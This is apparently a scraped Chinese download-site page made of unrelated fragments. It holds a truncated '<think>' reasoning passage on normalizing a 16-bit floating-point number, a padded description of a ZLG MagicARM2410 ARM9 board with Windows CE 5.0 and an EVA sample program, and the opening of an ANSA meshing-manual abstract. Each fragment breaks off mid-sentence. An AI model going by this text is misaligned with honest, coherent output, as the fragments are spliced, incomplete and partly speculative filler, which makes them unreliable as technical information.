<think>我们有一个16位的二进制数,其格式如下:-a15:尾数符号位(1位)-a14-a5:尾数数值位(10位)-a4:指数符号位(1位)-a3-a0:指数数值位(4位)规格化的目标:确保尾数数值位的最高位a14为1(即尾数的绝对值在[0.5,1)范围内)。步骤:1.提取输入信号的各个部分:尾数符号位、尾数数值位、指数符号位、指数数值位。2.将尾数数值位(10位)视为无符号整数M(范围0到1023),我们需要通过左移操作使得M的最高位为1(即M>=512)。同时记录左移的位数(shift_count)。3.调整指数:新的指数=原指数-shift_count(因为尾数左移相当于乘以2^sh
recommend-type

探索ARM9 2410开发板与wince5.0系统的高级实验

标题中的“周立功ARM (magicarm2410) 高级实验”指明了文档内容涉及周立功品牌下的ARM9 2410开发板的高级使用实验。ARM9 2410是基于ARM920T内核的处理器,广泛应用于嵌入式系统开发。周立功是一家在电子与嵌入式系统领域内具有影响力的公司,提供嵌入式教学和开发解决方案。MagicARM2410是该公司的某型号开发板,可能专为教学和实验设计,携带了特定的实验内容,例如本例中的“eva例程”。 描述提供了额外的背景信息,说明周立功ARM9 2410开发板上预装有Windows CE 5.0操作系统,以及该开发板附带的EVA例程。EVA可能是用于实验教学的示例程序或演示程序。文档中还提到,虽然书店出售的《周立功 ARM9开发实践》书籍中没有包含EVA的源码,但该源码实际上是随开发板提供的。这意味着,EVA例程的源码并不在书籍中公开,而是需要直接从开发板上获取。这对于那些希望深入研究和修改EVA例程的学生和开发者来说十分重要。 标签中的“magicarm2410”和“周立功ARM”是对文档和开发板的分类标识。这些标签有助于在文档管理系统或资料库中对相关文件进行整理和检索。 至于“压缩包子文件的文件名称列表:新建文件夹”,这表明相关文件已经被打包压缩,但具体的文件内容和名称没有在描述中列出。我们仅知道压缩包内至少存在一个“新建文件夹”,这可能意味着用户需要进一步操作来查看或解压出文件夹中的内容。 综合以上信息,知识点主要包括: 1. ARM9 2410开发板:一款基于ARM920T内核的处理器的嵌入式开发板,适用于教学和项目实验。 2. Windows CE 5.0系统:这是微软推出的专为嵌入式应用设计的操作系统,提供了一个可定制、可伸缩的、实时的操作环境。 3. EVA例程:一个嵌入式系统开发的教学或实验示例程序。它可能被设计用于演示特定功能或技术,如显示、控制或通信。 4. 开发实践书籍与源码提供:《周立功 ARM9开发实践》一书可能详细介绍了ARM9 2410开发板的使用方法,但书中的内容不包含EVA例程的源码,源码需要通过其他途径获得。 5. 文件打包压缩:文档可能以压缩包的形式存在,包含了需要的内容,但具体内容未知,需要解压缩之后才能查看。 了解这些知识点后,对于从事嵌入式系统开发的工程师或者学生来说,可以更好地利用周立功 ARM9 2410开发板进行学习和实验,尤其是可以进行更深入的研究和实验设计,通过EVA例程的源码来理解嵌入式系统的运行机制和程序结构。同时,也能够使用Windows CE 5.0系统环境来开发相应的应用程序。
recommend-type

【ANSA网格生成手册】:创建高效高质量网格的6个技巧

# 摘要 ANSA软件作为一款强大的前处理工具,在工程仿真领域扮演着重要角色。本文首先概述了ANSA软件的基本功能以及网格生成技术的基础知识。接着深入探讨了不同网格类型的选择及其优缺点,同时强调了网格密度与质量控制的重要性。文中详细介绍了高级网格生成技巧,包括自适应网格技术和多重网格以及混合网格技术的应用。此外,本文还提供了网格生成在实际应用中的前处理